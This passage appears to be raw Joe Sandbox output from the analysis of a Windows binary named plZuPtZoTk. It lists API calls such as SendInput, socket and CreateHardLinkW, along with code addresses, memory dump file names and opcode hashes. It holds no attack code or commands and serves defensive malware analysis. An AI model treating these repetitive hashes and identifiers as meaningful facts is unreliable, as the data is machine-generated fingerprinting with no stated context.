                                                                      • API ID: MessageSend$MoveWindow
                                                                      • String ID: Listbox
                                                                      • API String ID: 3315199576-2633736733
                                                                      • Opcode ID: ef904f3056c329fae8e80d51847ad37f6f307ef4a401c3d18483335bf827df0f
                                                                      • Instruction ID: 110f55c756dca100c9047d3728e6972b235e36c5ad1619946b43405c0469dfc1
                                                                      • Opcode Fuzzy Hash: ef904f3056c329fae8e80d51847ad37f6f307ef4a401c3d18483335bf827df0f
                                                                      • Instruction Fuzzy Hash: 2921AF72600218BBEF11CFA5CC81FAB376AFFC97A1F108114F9109B190CA71DC568BA0
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00A34A08
                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A34A5C
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00A5CC08), ref: 00A34AD0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: %lu
                                                                      • API String ID: 2507767853-685833217
                                                                      • Opcode ID: c3bc25d2d3473183998de80534b19a5ffff43c93d3b1d728b4a1769971584248
                                                                      • Instruction ID: a7644bbdda5331169dc8139c09caef42639b8ab59d98ab5292f1d47107ca718d
                                                                      • Opcode Fuzzy Hash: c3bc25d2d3473183998de80534b19a5ffff43c93d3b1d728b4a1769971584248
                                                                      • Instruction Fuzzy Hash: 69314F75A00209AFDB10DF54C985EAA7BF8FF48318F1480A9F909DB252D771ED46CB61
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A5424F
                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A54264
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A54271
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: e0811af686bd19f396f18ce705686df39802acb31f13788500fa5ac8b7ef608d
                                                                      • Instruction ID: f9955291a6881d82ce47819f55d9c62f2fb518ff4019c3f32b1f56b8afd9b5ca
                                                                      • Opcode Fuzzy Hash: e0811af686bd19f396f18ce705686df39802acb31f13788500fa5ac8b7ef608d
                                                                      • Instruction Fuzzy Hash: FB11E371240208BEEF209F69CC46FEB3BACFF89B69F114514FA55E2090D671D8529B20
                                                                      APIs
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                        • Part of subcall function 00A22DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A22DC5
                                                                        • Part of subcall function 00A22DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A22DD6
                                                                        • Part of subcall function 00A22DA7: GetCurrentThreadId.KERNEL32 ref: 00A22DDD
                                                                        • Part of subcall function 00A22DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A22DE4
                                                                      • GetFocus.USER32 ref: 00A22F78
                                                                        • Part of subcall function 00A22DEE: GetParent.USER32(00000000), ref: 00A22DF9
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00A22FC3
                                                                      • EnumChildWindows.USER32(?,00A2303B), ref: 00A22FEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                      • String ID: %s%d
                                                                      • API String ID: 1272988791-1110647743
                                                                      • Opcode ID: 0f309c96e997ab2c9a9870b5aa565b5d859294584d3ece8a62dfc0dac4810285
                                                                      • Instruction ID: c8ace0de0752b722e8e7599ec272b01cc9e130058a32125895468c459a276668
                                                                      • Opcode Fuzzy Hash: 0f309c96e997ab2c9a9870b5aa565b5d859294584d3ece8a62dfc0dac4810285
                                                                      • Instruction Fuzzy Hash: 7111B4716002157BDF14BF78AC95FED37AAAF85314F048079FD099B252DE349A498B70
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A558C1
                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A558EE
                                                                      • DrawMenuBar.USER32(?), ref: 00A558FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$InfoItem$Draw
                                                                      • String ID: 0
                                                                      • API String ID: 3227129158-4108050209
                                                                      • Opcode ID: 5dca91713c819e8bcb56d4daae16a1687ea1dcb597040a6530104ca746a8b54a
                                                                      • Instruction ID: 6231c9b1a113d3c9d0cfb8f2ebf064cfa68dec906b32a4b8e419845e23b2ae09
                                                                      • Opcode Fuzzy Hash: 5dca91713c819e8bcb56d4daae16a1687ea1dcb597040a6530104ca746a8b54a
                                                                      • Instruction Fuzzy Hash: AE018431900218EFDB119FA1DC45BAEBBB5FF45362F10C099E849D6261DB348A84DF71
                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00A1D3BF
                                                                      • FreeLibrary.KERNEL32 ref: 00A1D3E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                      • API String ID: 3013587201-2590602151
                                                                      • Opcode ID: 6a396d6a5b26453a36f50472caf2aae31605f5f931c5dbaf3d81aa473da1a0e4
                                                                      • Instruction ID: c2a471305657d6a5b16def19cbcb9296a9004daf02dc00dc6693cbc1e39e80be
                                                                      • Opcode Fuzzy Hash: 6a396d6a5b26453a36f50472caf2aae31605f5f931c5dbaf3d81aa473da1a0e4
                                                                      • Instruction Fuzzy Hash: 07F05571802B319FC73553208C949EE3334BF02B02B588616E812FE208EB34CCC48292
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 91fb29d325a360bc5aa34c1d7f37a0fb3fe1abb1df235c57b60aa5bc5d6d446e
                                                                      • Instruction ID: 2a83828d7f7f1e41f4575aa486016dba4e205d5c855ed5360ece5abef6bcad3b
                                                                      • Opcode Fuzzy Hash: 91fb29d325a360bc5aa34c1d7f37a0fb3fe1abb1df235c57b60aa5bc5d6d446e
                                                                      • Instruction Fuzzy Hash: 11C15A75A0021AEFDB04CFA8D894EAEB7B5FF48304F1185A8E505EB252D731ED41CB90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                      • String ID:
                                                                      • API String ID: 1998397398-0
                                                                      • Opcode ID: 27924ceee2d1a59a697a3bbc8376ffe29d443b57837e775dfafe85d4be2864e5
                                                                      • Instruction ID: 351c875c3a89c5538d431846ebbd33ab36e2c9ca6a8ef2487dbc8b7245236a09
                                                                      • Opcode Fuzzy Hash: 27924ceee2d1a59a697a3bbc8376ffe29d443b57837e775dfafe85d4be2864e5
                                                                      • Instruction Fuzzy Hash: 69A1E67A6043119FCB10DF68C595A2AB7E5EF88714F05885DF98A9B362DB30EE01CB52
                                                                      APIs
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A5FC08,?), ref: 00A205F0
                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A5FC08,?), ref: 00A20608
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00A5CC40,000000FF,?,00000000,00000800,00000000,?,00A5FC08,?), ref: 00A2062D
                                                                      • _memcmp.LIBVCRUNTIME ref: 00A2064E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                      • String ID:
                                                                      • API String ID: 314563124-0
                                                                      • Opcode ID: c6bca80b2ee3ce2d19f8fdf6cd788cc93747f3a3abf9c729b162084bad570d84
                                                                      • Instruction ID: acda06f566bba021b1d43284564a0c12f3cb4fbe37de4f0380a0ecee3941c41a
                                                                      • Opcode Fuzzy Hash: c6bca80b2ee3ce2d19f8fdf6cd788cc93747f3a3abf9c729b162084bad570d84
                                                                      • Instruction Fuzzy Hash: 77810E71A00119EFCB04DF98C984EEEB7B9FF89315F104568F516AB251DB71AE06CB60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: e10996a30dc93d13265c39cc5ebedb73158b6be2efa0f4ed17c30ad20f458438
                                                                      • Instruction ID: e95ea97cac3f7aa3e329cf9dcb4436d1baece2e7985a65b99b0897b4b23d8731
                                                                      • Opcode Fuzzy Hash: e10996a30dc93d13265c39cc5ebedb73158b6be2efa0f4ed17c30ad20f458438
                                                                      • Instruction Fuzzy Hash: B3412B7160051CABDB216BB9AC457FE3AA4EF81370F144226F529D72E1E7768C415362
                                                                      APIs
                                                                      • GetWindowRect.USER32(0166E410,?), ref: 00A562E2
                                                                      • ScreenToClient.USER32(?,?), ref: 00A56315
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00A56382
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: a2d7cc5f96c3a5667b33470adec5fca774bcef985c8f32b8947edbc56c8b0fb1
                                                                      • Instruction ID: faf668d16d3db13ef0bfbed2051ed44ee64c16ead8917f2bae9ae251693b6354
                                                                      • Opcode Fuzzy Hash: a2d7cc5f96c3a5667b33470adec5fca774bcef985c8f32b8947edbc56c8b0fb1
                                                                      • Instruction Fuzzy Hash: E2512B74A00209EFDF10DF68D981AAE7BB5FF45361F508269F8159B2A0D730EE85CB50
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00A41AFD
                                                                      • WSAGetLastError.WSOCK32 ref: 00A41B0B
                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A41B8A
                                                                      • WSAGetLastError.WSOCK32 ref: 00A41B94
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$socket
                                                                      • String ID:
                                                                      • API String ID: 1881357543-0
                                                                      • Opcode ID: 65f45b242ab6d4242a521d9ba686797377a3be9041da7b69a6a9b6afcbdf1e3a
                                                                      • Instruction ID: b08b398fc47170b2270adaf252ffec7ef6c43da24b3c1deb22984c99ede0122e
                                                                      • Opcode Fuzzy Hash: 65f45b242ab6d4242a521d9ba686797377a3be9041da7b69a6a9b6afcbdf1e3a
                                                                      • Instruction Fuzzy Hash: 40417078640200AFE720AF24C886F2977E5EB84718F54C45CF95A9F7D2E672DD828B91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5f503e9d4cbb5af5edf23345c92d4f855beb28f23045bba68981fee54dcf6b5
                                                                      • Instruction ID: faf49edd565fb5766fdae4c8e0ed742535881f194fa00918592c706d6bec2862
                                                                      • Opcode Fuzzy Hash: e5f503e9d4cbb5af5edf23345c92d4f855beb28f23045bba68981fee54dcf6b5
                                                                      • Instruction Fuzzy Hash: 76410875A00708AFD724AF38CD41BBABBA9EB84710F10452AF655DB691D775A9018B80
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A35783
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00A357A9
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A357CE
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A357FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: e6cb710953c3e394868556dd3b6de9f75f4903a9c9cf31f04afc638ce7cdd1da
                                                                      • Instruction ID: 01441727b5dffd3aa8eb0732067e4bf55d13a62db23f395e46e59b7f1f2fdd5b
                                                                      • Opcode Fuzzy Hash: e6cb710953c3e394868556dd3b6de9f75f4903a9c9cf31f04afc638ce7cdd1da
                                                                      • Instruction Fuzzy Hash: E441FA35A00610DFCB11EF55C545B5DBBE1AF89720F198888F84A5B362CB34FD41DB91
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,009E6D71,00000000,00000000,009E82D9,?,009E82D9,?,00000001,009E6D71,8BE85006,00000001,009E82D9,009E82D9), ref: 009FD910
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009FD999
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009FD9AB
                                                                      • __freea.LIBCMT ref: 009FD9B4
                                                                        • Part of subcall function 009F3820: RtlAllocateHeap.NTDLL(00000000,?,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6,?,009C1129), ref: 009F3852
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: 357912f26d35624ca4e02ab032d40becf854b0c9d80fe08b29e3f4aeeb4f120f
                                                                      • Instruction ID: dbe8175b166120de6f993d9c4fd952745b4226f69c4c8f3211c3b8e9d3ffaaae
                                                                      • Opcode Fuzzy Hash: 357912f26d35624ca4e02ab032d40becf854b0c9d80fe08b29e3f4aeeb4f120f
                                                                      • Instruction Fuzzy Hash: B231E172A0220AABDF25DFA5DC45EBE7BAAEB40710F054168FD04D7150EB75CE90CBA0
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00A55352
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A55375
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A55382
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A553A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                      • String ID:
                                                                      • API String ID: 3340791633-0
                                                                      • Opcode ID: 3e3d8a5d38547c5cab148cad6336b9cfc5e419f8129731c88b5319ddaa5acf96
                                                                      • Instruction ID: 45ec7bd349ac0a22a69865bed9b7fe94c4215d0bbb535225f5f23a09f4120beb
                                                                      • Opcode Fuzzy Hash: 3e3d8a5d38547c5cab148cad6336b9cfc5e419f8129731c88b5319ddaa5acf96
                                                                      • Instruction Fuzzy Hash: 2131C134E55A08EFEB249B74CC35BE83761BB053B2F584012FE199A1E1C7B499889B41
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00A2ABF1
                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00A2AC0D
                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00A2AC74
                                                                      • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00A2ACC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: efb86569349b3a2c141a9b7d634add910a0941f32edc134248d646cdb0c28061
                                                                      • Instruction ID: 34847ba1880eed40669a61601a58a2f5e250783b4dc5f6ca771124da4fb15e06
                                                                      • Opcode Fuzzy Hash: efb86569349b3a2c141a9b7d634add910a0941f32edc134248d646cdb0c28061
                                                                      • Instruction Fuzzy Hash: 84312830A00328AFFF34CBACEC047FE7BB5ABA5320F04423AE485521D1C37489858752
                                                                      APIs
                                                                      • ClientToScreen.USER32(?,?), ref: 00A5769A
                                                                      • GetWindowRect.USER32(?,?), ref: 00A57710
                                                                      • PtInRect.USER32(?,?,00A58B89), ref: 00A57720
                                                                      • MessageBeep.USER32(00000000), ref: 00A5778C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
